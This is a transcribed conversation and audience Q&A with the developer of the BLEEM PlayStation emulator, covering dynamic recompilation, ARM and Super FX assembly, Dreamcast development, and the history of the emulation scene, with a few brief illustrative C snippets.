phones. And Amazon Fire TV and Fire TV stick and it's a free game to download. But chunks of the game are from the original engine that's 1015 years old now. And so they're written in arm seven assembly. Okay. Yes. That's interesting. So that was the next, the next level, I think it was originally, as I said, designed for Game Boy Advance. I got it working on iPod video. I got it working on Cindy and cell phones. This was before cell phones had 3D graphics cards. Yeah. So to see a full 3D game on a cell phone. Nowadays, it's commonplace to see a full 3D game on the cell phone but back then, it was unheard of. Back when the phones weren't so smart. Exactly. When the phones weren't so smart. Nokia was everywhere. So we can use. So all the graphics and then have to be done in software. So Cyboyd was a sub pixel sub textal accurate high speed 3D engine. And mostly on arm. Arm is by far one of my favorite processors. Okay, let's let's hope they stay. They stay. They stay so. So, exactly. Well, now with with Mac using what they what they call Apple Silicon, which is basically arm. Yeah, they're here to stay. They're doing some cool stuff with emulation I heard so. Yes, exactly. They emulate x86 x64. Microsoft is doing the same on their on their surface and windows on arm that emulates. Yeah, yeah, I read a blog post about that. Yeah. But emulation is everywhere. Exactly. I kept keep telling people that but they don't believe me. So, yes. Yeah, no these days emulation truly is everywhere back. 
And when BLEEM on the PC came out, emulation was rare. It was exceptional, in the sense that it was very rare to come across something that needed emulation. And these days emulation is everywhere: it's in backwards compatibility, it's in forwards compatibility, it's in... the average PC these days has not only emulation built into it, but emulators that run on it. And I think that's a good thing. Oh, absolutely. It's a good thing, but one thing that still puzzles me. So it's like, so emulation is everywhere. It's part of most things. And yet, if you go to Amazon and search for emulation books, you will find absolutely zero. I don't know if it's zero, but a couple of years ago it was zero, right, if you go and search for papers on emulation. Okay, it's not zero, but it's not like papers on, I don't know, something popular. You know, anything, any graphics. Yeah, exactly, any graphics thing or whatever, right. If you go to conferences or YouTube and you search for emulation talks and conferences, that's also not that much. I have a playlist of all the videos I could find. I think it's like 10 videos, and like five of them talk about the same thing, right, and they're good videos, but, right, so that's something that still puzzles me. I'm not sure why that's the case, but sorry, I'm just venting, I don't know. Emulation is one of the black arts of technology and programming. Emulation is sort of a niche. It's not like graphics, where, you know, everybody, oh, graphics. You know, the latest thing is now ray tracing with graphics, and I remember back on the Amiga, where they had the bouncing ball, the Juggler with the ray-traced balls, and now that can be done in hardware. But emulation, I think it's a technology that... it's a calling. You're either really into the emulation scene, as it were, or you're using emulation and oftentimes people don't even know it. Like I said, backwards compatibility for games. So a good example: Apple's new Macs that let you run the old software, transparently. I think emulation is one of those things where there isn't really a book on it. And it's not because... it would have to sort of be more about the generic here's what you're trying to accomplish, rather than here's a concrete example of an emulator. Yeah. Yeah, yeah, yeah, you have a point. You have a point. I'm sad to say you have a point. Yeah, there isn't a big calling for how to. Yeah, what you just said made me think about all those books on games, and there are a lot of books on games, and yet they don't teach you much about games, right, so. No, they don't. They teach you... they'll teach you 3D math or they'll teach you 2D math and transformations, but it's harder to find a good book on games, on writing games and all the complexity. It's sort of like the proliferation of games and apps on cell phones these days. They really sort of fall into one of a few categories: one is the standard match-three game, like Candy Crush. You've got the choose-your-outcome game with match three, like Homescapes, you've got puzzle games like word combination games, and then you've got card games. Often you'll have something like a Call of Duty or Fortnite or something like that, which is tough to play on a cell phone anyway. But you won't have games that were from back in the Commodore 64 days, like Broderbund. Games like Zeppelin or Lode Runner or Frantic Freddie on the Commodore 64; just finding books about making those kinds of games is harder. 
The latest project I'm working on is built on mono game, but before mono game was the platform of choice. I went through a couple of weeks of I looked at Unreal I looked at Unity. I don't even remember all of the platforms and libraries and tool sets and tool chains that I looked at before I finally ended up settling on mono game. And it's nice that there's all of these things that are that are available. I mean the, the, the Unity example comes with a full 3D platform game as a sample. Something like that would would, you know, take somebody a couple of years to build but here it is you just point and click and now you've got a Lego platform game with physics and 3D and everything and then it's, it's not particularly fun to play it. But it's nice that the technology is there. Somebody discovered that fun doesn't necessarily mean sales but yes, let's let's not get into that. That's a very frustrating discussion so it is it is today's independent developer is screwed. It's a different ways from Sundays. It is as an independent developer myself, it is very, very difficult to, to earn a living. Basically, people don't like ads. People don't like paying for games. And people don't like in app purchases. So, you're sort of stuck between a rock and a hard place. Yeah, I guess. And the last thing about what you just mentioned when we were talking about the books and such. So, so I'm not, you know, I'm not going to ask you how you learned so that's because it's different times of course and different mindsets but how do you think people can get better at reverse engineering or emulation developments. I don't know how do how can people practice. That's a good question. I would say that people should look at existing a lot of existing emulators are open source open source is wonderful. It's phenomenal. I can't say that enough that's why I released the source code to doom for the Super Nintendo on the Super FX chip. Because I think it's important to give back. I've been very, very fortunate to work on some, some great projects. I've been very, very blessed. I wanted to share the knowledge. And I think that if people would look at existing emulators and the source that's available. They'll get an idea of the complexities involved. Emulation of a given system. Oftentimes is the same you've got your processor, you've got some co processors you've got some extra chips. So find out as much as you can about the chips about the system about how things fit together. Look at existing emulation software technology, especially stuff that's open source. And read a lot of it is is reading. I mean reading code or reading literature. Both. Both. Code, I think you're right. In the code sort of shows you the end results. It doesn't show you the steps that it took to get there. But sometimes it's okay to, to know the answer. If you're in the right mindset, you can figure out what the question is. If you're looking at existing code and how existing code operates, you get the answer. But then you can go in and you can tweak it and see how things change. And I think that that's important. There aren't really books on emulation but there are books on the processor and and these days, as I said, most people don't have a processor manual because they've got a C compiler or they're writing in C sharp and it's in interpreted language or intermediate language. 
But one of the most interesting videos that I had seen recently, for me personally, was, like I said, the process that this team of two or three people took to delaminate the die of a 6502 processor. And it showed here's all the gates and here's how the gates operate, and I, in my mind, because I had programmed it in machine language. I mean, I still know LDA immediate accumulator is A9 and hex 20 is jump to subroutine and hex 60 is return from subroutine, and so I programmed knowing all of these opcodes. But to see how the bits are actually implemented in the silicon was amazing. The technology that's 30-plus whatever years old now for the 6502 is nothing compared to today's chips. But never stop learning, I guess, is the best advice I can offer. It sort of goes back to: there's always a better way of doing something, there's always more efficient code, cleaner code, more robust code or smaller code or whatever. But if you've got that quest for knowledge and that interest, it will keep you going, and that, I think, is one of the key things that sets apart emulation programmers from other programmers. Yeah, okay. I was just triggered by something you said. It wasn't actually my intention, this was supposed to be the last question, but this will keep going on. Unfortunately. But, so I was actually thinking, did you actually worry about cycle accuracy during the BLEEM development? No. Okay. Okay. Cycle accuracy is... there are pros and cons to cycle accuracy. BLEEM is not cycle accurate. But that doesn't matter. And it matters even less these days. Because games aren't like they were back on the 6502 or 65816 with the NES and the Super NES and the Sega Genesis and the PlayStation, where you have to have lots of really complex code and it had to be timed and it had to be efficient, and these days, your code is typically not the bottleneck in a given system. So, you know, the polygons you're trying to push or something else, and your code is running faster than the frame rate anyways, and so generally speaking, no, BLEEM was not cycle accurate and it wasn't intended to be. Yeah, okay. We actually have a talk about cycle accuracy. It's a short talk, but it's amazing. But you didn't have... cycle accuracy is tricky. It's tricky, but so I don't want to spoil anything because I don't know in which order the talks will be, but actually the speaker, he kind of said, because I watched part of his talk because they should be uploaded and such. And he actually argues that cycle accuracy is, yeah, kind of like a... it's not the most important metric you should try to adhere to. Let's leave it at that. I would agree. I would agree. And BLEEM is a good example of cycle accuracy being just a measurement. But when it came to the enhancement of the games and the full-screen bilinear filtering and multi-sample anti-aliasing on BLEEM for Dreamcast, cycle accuracy wasn't even part of the equation. But the results, I think, speak for themselves. Yeah, okay. That was almost most definitely. But did you, like... so like I said, the questions just keep coming. Anyway, so did you, like, come across any bugs that were caused by the cycle accuracy of the PlayStation? And yes. Oh, yes. Yes, especially in later games. Later games are much more difficult to emulate at a high level, because programmers started writing directly to the hardware. And the code was much less efficient. 
But later games were much more efficient and they knew that if they did this sequence of operations, it would take this many clock cycles, and then they could do this sequence of operations. And it's sort of like the, the Pentium where you had your floating point pipeline and your integer pipeline and all these pipelines could be interleaved if you did certain things in certain order. And so yes, the, the later games in particular were tricky to emulate because BLEEM was not cycle accurate. Okay. And what about BLEEMcast because you're talking about too far and you know you don't have as much control as the PC of course right. So, actually had more control. Really. Mm hmm. BLEEMcast was actually nice because we had complete control of the system. Okay. And no, no OS security. Okay. I always assume because you know they have the Windows CE logo that it was like secured to hell and back right but No, everything was written to the lowest level straight to the metal. Really. Oh yeah. That's very interesting. Yeah, BLEEMcast was was all low level talking directly to the chips. I mean because at least those GD ROMs you couldn't read them really properly on the PC, right. Because. Well, you could. There were ways of reading them. Yeah. Okay. But I don't want to like inspire people to go in there. We did a lot of weird stuff with the dreamcast and. Yes. Okay. It was a misspent. Underlying operating system on the dreamcast even for dreamcast titles. You basically would write your title and link with Sega's libraries. But there was there wasn't really a low level like on Windows where there's an operating system that's running all the time. Okay, that's interesting. So for BLEEMcast we had complete control of the system, complete control of the hardware. It was it was a lot more work. Because there wasn't an operating system and because we couldn't use Sega's libraries. How did you actually. Okay, so how did you compile for the dreamcast without Sega's libraries. By writing straight to the hardware. And the structure. Oh, you wrote the executable for. Okay, that's amazing. And it's all SH4. Yeah. Okay. Hitachi thing or something. Yes, Hitachi SH4. And we had all the documentation to the PowerVR chip set. And to the Sega Dreamcast chip set. And we knew what registers to write what values to do certain things and it was all written in low level assembly language. Uh huh. Because because Sega, Sega provided all of the information, but said, we can't endorse you we can't really support you. We can't publish your title. So we have no level hardware documentation that we don't give to anybody else. For all the different chips that are in the dreamcast. Enjoy. Okay. And psycho accuracy was never a problem that or it was. No, it wasn't. It wasn't a problem because the game was running faster. And it was waiting for vertical blank rather than the emulation running slow. The same dynamic, dynamic optimizing the recompiler that I wrote for the PC that took MIPSR 3000 code and generated x86. I wrote one that took MIPSR 3000 code and generated optimized SH4. Really. Yeah. Let me write that down. Are you allowed to do that? I mean, does the dreamcast allow you to do that because you're basically changing the running code. Yes, exactly. Wow. And then the dreamcast I don't remember how much ram they had but it wasn't a lot. It was enough. Yeah, there was more than enough for writing optimized SH4 code. Because the PlayStation was very limited. Yeah, compared to the dreamcast and a PC. Okay. Yeah. 
There was never a problem there: if the dynamic recompiler ran out of memory, it would just flush everything and start again. And so there wasn't really ever running out of memory. Yeah, okay. It basically recompiled blocks of code. And it just kept it in a big buffer. Yeah. And when it ran out of space, it started from scratch again and said, okay, pretend that none of the code is compiled yet. Start recompiling. Your game would, like, slow down for a bit till it, like, warms up again? Imperceptibly, because it happened so fast. But yes. This is... you would never imagine all that was going on. Exactly. On a totally, totally foreign system. Yeah, yeah, that's amazing. Thank you. It truly is a shame. So, you know, we will never see the code, but who knows. Maybe somebody out there will reverse engineer it for us. And I guess I saw your doom code, right, and one thing that really... so I haven't been through all the code and I'm not that good at assembly, but one thing that really jumps out at me is how well it was documented. Thank you. No really, because, and I'm not trying to offend anybody, but because the principal has been complimented on my code. I mean, it was, but you know, because undocumented C code I don't have a problem with, okay, I have a problem with that, but it's still C code, but undocumented assembly code, right, that's... and it's very well structured, very well documented, and so I thank you. I hope whoever reverse engineers BLEEM documents and structures it in the same way, so let's just say. The code is... Well, that's what you get when you spend 38 years writing code; you sort of build up a degree of self-documentation, because eventually you'll go back and it makes it more maintainable. And the code from, I want to say it was '95, '96, was the super effects code, I think, roughly, a long time ago. But still, it was very nice and I'll look through it and see how it works out. Well, thanks. Well, like I said, there's an even better way of doing it now. Yeah. So with emulation, so that's always nice. You meant running it. Sorry, or at least that's what I meant. Right. So yeah, I don't. Yeah. I'm looking at my list of questions, because I wrote a lot of questions beside the questions that I sent you, you know; like I said, I couldn't sleep so I kept writing stuff and whatever, but yeah. So do you have anything that you think we should have talked about and we didn't talk about? I don't think so. I think we covered a whole bunch of different things. Yeah, okay. Yeah, yeah. Yeah, I can always come up with questions, but I think, you know, enough should be enough at some point. Okay, I've kept you for a very long time now. And no trouble at all. I'm very, very grateful. I think a lot of people will be grateful. I mean, you mentioned you will be, or you will try at least to be, available for Q&A. I will. I will be available for Q&A. As soon as you tell me when it's scheduled, I will make sure that I'm up either very early or very late. Yeah, we will set it up. And I hope, so yeah, this is our first time doing this at FOSDEM. FOSDEM usually has a lot of rooms, developer rooms, and we usually have a retro computing room and there's some emulation talks there, but this year we thought, let's try to do a dedicated emulator room. So it's the first edition, and so far the talks have been good, like the proposals, and I hope a lot of people attend and have a lot of cool questions for you, right? So that's what I'm building up towards. You've been great. You've been awesome. 
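Stepping back to the detail above about the recompiler's memory use: the "keep translated code in one big buffer and throw everything away when it fills up" approach can be sketched in a few lines. Again this is only an illustration with made-up names and sizes, not the actual BLEEM or BLEEMcast implementation.

/* Illustrative flush-on-full code buffer (hypothetical, not BLEEM's source).
 * Translated blocks are appended to one large buffer; when it fills up, the
 * emulator simply forgets everything and pretends nothing is compiled yet.  */
#include <stdint.h>
#include <stddef.h>

#define CODE_BUF_SIZE (4u * 1024u * 1024u)   /* size chosen arbitrarily here */

static uint8_t code_buf[CODE_BUF_SIZE];      /* holds emitted host code      */
static size_t  code_used;                    /* bytes already handed out     */

extern void invalidate_block_cache(void);    /* hypothetical: mark all guest
                                                blocks as "not compiled yet" */

uint8_t *alloc_code(size_t bytes)
{
    if (code_used + bytes > CODE_BUF_SIZE) { /* out of room?                 */
        code_used = 0;                       /* flush everything...          */
        invalidate_block_cache();            /* ...and start recompiling     */
    }
    uint8_t *p = code_buf + code_used;
    code_used += bytes;
    return p;                                /* translator writes code here  */
}

Because translation itself is fast, the brief re-warm-up after such a flush is barely noticeable, which matches the "imperceptibly, because it happened so fast" remark above.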
I don't know how to thank you actually. My pleasure. My pleasure. It's been an honor. The honor was all mine really. So thank you very much again. I don't know. That's that's the end. Yeah, okay. It's very sad to say that. So I'll probably stop, you know, cut the video at this point and this. Sure. Well, if you come up with more questions and you want to have another hour chat or something. You're spoiling me. You're spoiling me. Right. Not at all. Yeah, so I'm taking a quick look and seeing if we went. I think we got to. I think we got through all of the questions that you'd written down but I'm sure that there's a whole bunch more that are always are the always are this. It's a problem right so and that's good though that's good it's. I don't know if you're going to share the. Yeah, but you know right like so so you're a very kind person and I don't want to like miss you that you're such a kind person and just keep you talking for a couple of hours or just bug you out of nowhere and that kind of stuff so no problem. It's thank you very much for that. This is awesome. I don't know how it is going to work out. We will plan the Q&A of course and we'll see how it goes. Thank you very much again. I look forward to being online and answering some questions and chatting with the audience. I'm very sure there'll be a lot of questions but we'll see. So, and a lot of more advanced questions because you know I'm not that active in emulators more as I used to be, but some of the more advanced people will ask questions that you will enjoy more than my questions I think so. I have enjoyed your questions immensely. Thank you. Thank you. Thank you. Thank you so much. Thank you. Thank you. So thank you again. Enjoy the rest of your day and I will keep you in the loop. I guess for the things. What about the super FX chip for a while, right? I think we're doing live Q&A, by the way. Let me just get one second here, see how we're doing. Yeah, I'm just waiting for the bot to announce that channel thing again. Yep. Hey, we're getting some questions as well. Have you been eating as well? It's been a long day. It's been a long day. I have. In between, I've been eating and I've had by my coffee and my tea and... All right, good. Good. Yeah, I've also been running back and forth between sessions. Okay. And we are live. Yes, we're live. Excellent. Now, if that bot would just do that one message, right? Otherwise, we can just go ahead, but I think it's a bit nicer to wait. Yeah, yeah. What are we waiting for? I thought the bot would give our links in the chat again. No, no, no, no, no. This is part of the live Q&A. This is on the live feed. Gotcha. We have like 40 minutes on the live feed, I think. That's perfect. All right, so let's just go ahead then. Sure. Welcome back, everybody. This time we've got Mahmood in the video as well. I think we're just going to do some audience questions and then... Dressed as Waldo for the people who know who Waldo... Yeah, that's amazing. So, let's start strong and then just sort of fizzle out. I'm going to do some audience questions here. And some of them have already been asked, but just now we got a new one. Let's start with the fresh one. Pegasus Ryder asks, how is the machine language translation implemented? For BLEEM, it was done in Pentium, all assembly code, where it took each instruction and dynamically optimized the MIPS op codes into Pentium x86 instructions. 
And on the Dreamcast, on the BLEEMcast, it took the MIPS R3000 and generated optimized SH4 for the Hitachi processor. Does that answer? We'll have to wait for Pegasus Ryder's response, but in the meantime, we'll move on. Another relay question that you've answered in the chat, but let's put it here for posterity. What was source control like back in those days? Yeah, back then, none. There was none. There was no source control because it was just me on the PC, so there wasn't any source control. And on the BLEEMcast, there was just myself and there was Rod. And so between the two of us, we didn't really need source control either. But if there were more developers, or if there were a lot of art assets, things like that, we would have definitely needed some sort of source control. But back then, this was around the time when there was, I want to say, SVN and Tortoise. And I want to say there was Microsoft SourceSafe, because I remember there was some big bug where all of a sudden you lost all your code. There was no source code version control. Nothing ever went wrong? No, nothing ever went wrong. Usually I'm a fairly organized person. So yeah. We also saw the notes, so we know how organized you are. Yes, those are real notes from the Dreamcast development process. So yeah, you can see I did this; to this day, I still use a pencil and a notebook with written notes in it. So in theory, we can rebuild BLEEM from your notes? Theoretically, yeah. Okay, but a follow-up question for the source control question, because when you got to BLEEMcast, you had somebody working with you. Did you guys do code reviews of each other's code? Not really. We were working on different areas of the code. I was doing the vast majority of the code and Rod was helping out. So pretty much it was coming from BLEEM on the PC. A lot of it, I don't want to say was translating, but a lot of it was translating, because I had already done the majority of the reverse engineering. So it was sort of like doing a port, I guess is the best way of describing it. It was more like doing a port. There was still some reverse engineering. Like I said, with Metal Gear Solid, beautiful game, even by today's standards, some of the special effects that they used, I needed to do some reverse engineering to figure out exactly how they were sending down certain types of polygons and things like that. But the vast majority of the hard work of reverse engineering the PlayStation system, that was already done. Alright, we're getting a really nice question here from Phil. I'm just going to paraphrase it. You've talked about reverse engineering. And Phil wonders, how could you bring this mentality or curiosity to a new generation? Do you think it can be taught at schools or universities? Good question. I hope it is. I hope, because technology moves so quickly that without emulation in particular, we're going to lose a huge amount of our history. It's only been 30 or 40 years for video games. And if we don't preserve video games, we're going to lose all of that early history. Everybody knows Pac-Man and everybody knows Space Invaders. But if we don't have some way of bringing that history forward... it's sort of like studying art. Now, I don't know very much about art. But universities teach art appreciation and art respect and they teach painting classes and things like that. And I think that especially for computer science and technology, it's important that we not only preserve the past, but we teach about the past. 
And so I don't know that there's going to be an emulation course per se. I think a lot of courses teach processors, for example. FIENSE, that kind of stuff. Exactly. And I think that that's a very good start. Machines these days are, they're very advanced, especially when you get to PS5 and Xbox Series. They're very, very advanced machines. But the APIs, the programming interface to them, is much, much higher level. Whereas compared to, like, the Super Nintendo and the Nintendo 8-bit, you wrote everything in assembly language and you had a hardware manual that explained how all of the different hardware registers worked. And these days, you don't really need to do that, which is good. But now everything is... you have to have the latest, most complex mathematics for doing ray tracing and things like that. And it's different trade-offs. It can be quite daunting. Yeah. Yes, exactly. The scope of knowledge required is much, much larger than it used to be. The university is still four years. So it's all very tricky to fit. Anyway, you just said the word Super Nintendo again. I keep forgetting to ask the question, but you mentioned, or I read it somewhere, that for the Super FX chip, when you were doing doom, there were no development systems available. Yes. So how did they expect you to reasonably do a job there? Well, they didn't. Oh. So we received, at Sculptured... Sculptured received the, here's the list of opcodes. But Nintendo was still developing the development system itself and they didn't really make it available. And so I came up with the idea of, hey, let's hack the Star Fox cartridge. Let's replace the ROM with RAM. I mentioned this, right? Yeah, it was literally a big breadboard with RAM on it and a little tiny boot ROM. And I wrote an interface that connected between the joystick ports. It was a serial protocol, so it was only two or three bits. And then I was working on the joystick ports on the Super Nintendo and the Amiga parallel port. The whole development system was all done on Amiga. So that's why, when I released the source code to the Super Nintendo version of doom, I released the development tools as well, but they're all compiled for the Amiga; but if you've got UAE, it actually builds. It's a nice thing. So they did not expect you to properly do that. No, no, they didn't. At the end, towards the end of development, when I had the prototype operational, Nintendo sent over a custom hardware development system. It was a big box that had the super effects chip inside of it. Did that help at all, or were you finished with that? Oh yeah. Yeah, yeah. Oh yeah. Immensely. But it took a lot of work to get it operational. It was a SCSI-based interface. And I had a SCSI card on my Amiga, and so I had to write low-level... I had to reverse engineer Nintendo's development system in order to make it work with my development system. And when that was done, it was possible to complete the project. I think it was quite well received as well. Have you ever worked, not only in the Nintendo area, but have you ever worked with any of the later enhancement chips like the DSP series? No, nothing. Yeah, my experience was just limited to the super effects. Gotcha. Okay. So audience questions. If you want to chime in, just go ahead. You're here now. No, no, no. Great questions. Great questions. Let's see what other people have the pleasure of asking and answering and getting into. This is quite a valuable question. 
One question was if you could give us a one-on-one: what's a dynarec exactly? Yeah, we had a couple of discussions yesterday and some people talked about it and, you know, we were interested in, you know, how to get people started there actually, and what it is and how it works, that kind of stuff, right, so. Okay. Well, typically, an emulator is an interpreted emulator, which means that you've got your program, and sort of like the way the processor works, you read one instruction. You figure out what the instruction is, and then you perform the operation, so it might be addition, it might be subtraction, it might be exclusive or, but you do it one step at a time by reading the instruction from the memory, interpreting it (that's why it's called an interpretive emulator), and then running code that does the actual operation. A recompiling emulator can generally be one of two forms. Ahead of time, where basically you take the program as a whole, and you translate: instead of interpreting each opcode, reading one opcode, interpreting it, and then performing the operation, you translate it. It's sort of like taking a book and translating the book into a different language; you start at the beginning, at the very first word of the very first page, and you translate word for word, and you translate from one language like English into another one like French, say. And then you've got a book that's completely in French, say, which you can read. A dynamic compiler does this translation, but instead of doing it ahead of time, it does it word for word while the program is actually running. The dynamic recompiler will dynamically, as the program is executing, instead of interpreting each opcode, translate from English to French as somebody is speaking; it's sort of like having a translator in between the two processors. And then you've got the original code that was written in one language, like MIPS R3000; you've got the program, which is the emulator, and it translates while the program is actually doing the running and the operation. And then the end stage is where you've got an optimizing recompiler, where, if you've got multiple sequences of operations, the dynamic recompiler can see the data flow, where data is going, sources and destinations and what kind of operations are being performed, and it can combine these operations together. And then it can optimize certain operations; like, multiplying by zero always gives you a zero, so you can skip the step of doing the multiplication. So, sort of an obscure example, but there are cases like that where, if your original language has an instruction for addition, a translated language might have multiple ways of doing addition. If you only want to add one, usually there's an opcode to increment. And that opcode is a smaller, more efficient opcode, because it knows that it's only going to be incrementing by one. So you can see, oh, this one processor has an addition instruction and it's adding one. So instead of writing the generic translation of using the addition in the target processor of adding the value one, I'm going to use the increment instruction instead, and so it ends up generating an optimized version of the original code. Does that sort of help? Flipping a single bit instead of doing the whole generic. Instead of adding generically, it can use the special opcode, which is typically a smaller opcode, to increment. That makes sense. 
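As a rough companion to the explanation above, here is how the two ends of that spectrum differ in code: a fetch-decode-execute interpreter loop, and the "adding exactly one can use a cheaper increment" peephole optimization a recompiler might apply while translating. Everything here is invented for the example (a two-opcode toy guest instruction set, x86-flavored output strings); it is only meant to show the shape of each approach.

/* Toy illustration of interpretation vs. (optimizing) recompilation.
 * The guest opcodes, their encoding, and the emitted text are all made up. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum { OP_ADD_IMM = 0x01, OP_HALT = 0xFF };   /* invented guest opcodes */

/* 1. Interpreter: fetch one opcode, decide what it means, do it, repeat. */
static void interpret(const uint8_t *prog, uint32_t *acc)
{
    for (size_t pc = 0;;) {
        switch (prog[pc]) {
        case OP_ADD_IMM: *acc += prog[pc + 1]; pc += 2; break;
        case OP_HALT:    return;
        default:         return;               /* unknown opcode: stop */
        }
    }
}

/* 2. Recompiler: translate each guest instruction once into host code.
 * 3. Optimizing recompiler: while translating, notice special cases, e.g.
 *    "adding exactly 1" can use the smaller increment form mentioned above. */
static void emit_add_imm(uint8_t imm)
{
    if (imm == 1)
        puts("inc eax        ; cheaper special case");   /* optimized form */
    else
        printf("add eax, %u\n", imm);                    /* generic form   */
}

int main(void)
{
    const uint8_t prog[] = { OP_ADD_IMM, 1, OP_ADD_IMM, 5, OP_HALT };
    uint32_t acc = 0;

    interpret(prog, &acc);                       /* run it the interpreter way */
    printf("; interpreter result: %u\n", (unsigned)acc);

    for (size_t pc = 0; prog[pc] != OP_HALT; pc += 2)    /* "translate" it */
        emit_add_imm(prog[pc + 1]);
    return 0;
}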
A couple of years ago they had, for the first time, a talk. I think they were doing research about something called superoptimization. I'd never heard about it before. It's what you just, you know, the last part you just explained, but on steroids. And I couldn't really see it working in real life, maybe for small snippets of code, right. It does. No, no, but what they did, not what you mentioned. Okay, that I believe, but what they did, that was like brute forcing all the possibilities and then seeing which ones are the best, you know, and then using that type of code, and speculative stuff. Yeah, but the way they explained it was very interesting. Yeah, research, university stuff, so cool stuff. Yes. Sorry. I'm going to jump right in here again. Sure. Which assembly dialects have you enjoyed the most? Good question. That's a good question. I think by far my favorite is arm assembly. Original arm assembly, because, well, it's a toss-up. I've enjoyed the super effects GSU too, because it's largely a RISC processor. And it can combine... it's like the arm processor, they're very, very similar. The arm processor can take multiple source operands, do an operation, and put the result into a destination register. So you can do things like take one number in a register, add it to another register that is shifted by a certain number of bits, combine the result and store it in a third destination register, all in one opcode. So it's very, very powerful. That's why arm is used in most cell phones, in most handhelds, in low-powered devices, because it's a very, very powerful instruction set that is also very compact. Yeah, so I'd have to say definitely it's a tie between arm and the super effects GSU, because it also could do similar kinds of operations: you could take one source register with another source register, so you had two source operands, combine the result and store it into a third destination register. Very, very elegant. To be honest, I had expected you to say 6502, but... Oh, I like 6502. Really a dialect of course, but I like 6502, but I think that arm and the super effects are just so much more powerful. So you've got 6502 and 65816 because they're simple. You've really got three registers: you've got your accumulator, you've got your X index, and you've got your Y index, but on the arm processor you've got 15 registers, you've got all these registers, and on the super effects you've got 15 registers. There's a lot of flexibility. And it's nice because it allows you to do some very, very powerful things. These days compilers take care of that for you. You write your C code and the compiler generates really nice optimized code, but back then the average programmer who was an assembly language programmer could out-optimize a compiler. And these days that's not really the case anymore. I see in a comment here, I guess the answer would include Motorola 68K, or Z80 perhaps, right, so. Yes, it would. I like 68,000. I think 68,000 is a little more cumbersome. But loved the Amiga; the Amiga is, I think, by far one of my favorite platforms ever. I've done 68,000 for sure. Yes, and I've done very, very little Z80. Z80 is one of the very, very popular processors that I don't have very much experience with. Yes, also very popular at this conference. 
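To make the earlier point about ARM's combined shift-and-add concrete, here is the same computation written in C, with the single ARM instruction that a classic ARM core can encode it as shown only as a comment. The register assignment is just an example, not taken from any real program in the conversation.

#include <stdint.h>

/* One C statement that classic ARM can encode as a single instruction,
 * thanks to the barrel shifter on the second operand:
 *     ADD r2, r0, r1, LSL #2      ; r2 = r0 + (r1 << 2)
 * A 6502, with only A/X/Y registers and no such addressing, needs several
 * instructions and memory traffic to do the same thing.                    */
uint32_t shift_and_add(uint32_t r0, uint32_t r1)
{
    return r0 + (r1 << 2);
}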
So, yes, today alone there were like three or four talks, and yesterday it was mentioned a couple of times; it's generally very, very popular at FOSDEM, so. Oh yeah. Alright, sorry, Nils, take it away. Let's see what else I have. I was looking at the BLEEM manual. Yes, since I have it here now. And one of the things, on page 22, it says: a game that used to work fine is now freaking out. If you're getting random graphic glitches in games that normally render fine, it usually means memory has gotten stepped on somewhere. I don't know, could you explain what that is? I'm not quite sure. It has been so long since I've seen that marketing language, right, so that's marketing speak. Yes. I don't even know what to say. Well, then we'll leave it at that. I just want to say that this is really nicely written. David, David Herpolsheimer, my business partner from BLEEM, did that. He did. He did all the graphics. He did all the marketing and the sales and, oh yeah. When people think of BLEEM they think of the emulator. The emulator was just one small part. There were a lot of people that, like I said, like David, or like Will Kep or Scott or John Hengartner, our attorneys, who made BLEEM possible. I'll highlight another thing that I really like and then we'll get back to the questions. On page 5, launching BLEEM: because we know you're probably not even reading this. We hate manuals too. We've preconfigured BLEEM to let you start playing right away. It's all really nice, and I also saw somewhere, like, an advertisement. It says 400 new games for your Dreamcast. Yes. It's just really, really nice. Whoever thought of those things. Yes. An audience question again, from C Creighton. A question from an uninitiated about the dynarec. Do you take into consideration the timing of certain operations, and how? Yes and no. For BLEEM, BLEEM didn't really take into account that certain operations took longer than other operations. And so that caused potentially all sorts of issues. For example, multiplication is typically an operation that takes more than one clock cycle. But on BLEEM, multiplication wouldn't necessarily take more than one clock cycle, depending on the processor that it was running on. And so there were estimates of how long each operation should take. But BLEEM wasn't cycle accurate. And so it didn't really take into account things like latency and hardware latches and opcodes that took multiple clock cycles. I think that answers it. I have a relay question. I want to run PS5 games on my PC. Where do I begin? You relayed that from yourself, Nils. Yes. Where do you begin? Okay, so get a big PC case and empty out the PC. Put the PlayStation 5 inside it. Close it up again. So just give up, basically. Well, at the moment, give up. Maybe go for PS4 first. Exactly. Go for PS4 first. Like I said, these days the machines are so complex and so fast that it usually takes a generation... that was one of the things that was rare, I think, about BLEEM, that the need for a generational leap wasn't quite there yet. So you could run, on a reasonably low-end PC, a PlayStation game that had all of these custom chips and custom hardware in it. These days PS5 and the new Xbox Series are state of the art. So you could buy a very, very high-end PC to run games comparably. And to emulate them, I think that that's probably a couple of years out. 
I'm seeing some comments here, because this is something that people discuss a lot, because most of the hardware of the new Xbox and PlayStation 5, it's all x86. Yes, it's all x86. I'm pretty sure that it's Ryzen. Yeah, I think so, yeah. Yeah. So the assumption is usually it should be actually easier to implement. Yes, emulate, right, so. Yes. Yeah, I would agree. It should be easier. I think that especially, as I said, games these days are writing to a higher-level API. You're not writing to the low-level hardware as much. And so I think that emulation of later systems is in fact easier. To use an example, for the Dreamcast: I would personally, were I to write a Dreamcast emulator, I wouldn't emulate all of the Dreamcast hardware. I would emulate the software libraries, because all the developers have to use the software libraries. And so if you knew that the software libraries were there, you would use the software libraries and do the same kind of enhancements that BLEEM does, for Dreamcast games on PC. Oh, sorry, I was muted because my neighbor is drilling, because he likes to drill. So, but because you just mentioned PlayStation 4: have you looked at any of the... I don't know how many PlayStation 4 emulator projects there are, but there are, I think, at least two. So have you looked at any of those? Have you looked at them at all? And this is another curiosity of mine: back in the day after BLEEM, well, you know, after Sony happened, did you at any point, sorry, take a look at ePSXe or PCSX or the other PlayStation emulators that were coming up around then? No, and I know that PlayStation emulation has come a long way since BLEEM, by far, but I never really looked at the other emulators that were out there. Here's a question I shouldn't forget. If I can interject again. Yeah. What does BLEEM mean? That's a good question. Okay, you're ready for the answer? I think so. BLEEM doesn't mean anything. I know, disappointing, but BLEEM has no meaning. It's just a made-up word. It's not best little emulator ever. No, it's not best little emulator ever. It literally has no meaning. I was asked this once, many, many years ago. And so now the world knows BLEEM really doesn't have a meaning. This is a big highlight, I think. Where did the whole thing come from, the whole best little emulator ever made? I don't know. A number of people... there was a big question around what did it mean? And I wouldn't tell anybody that it didn't mean, that it doesn't mean anything. And so people started coming up with acronyms. I think it was from an article, because there was an article. It was titled best little emulator ever. It was very popular. So that's at least where I got the name from. I know it's not an official name because it wasn't in any of 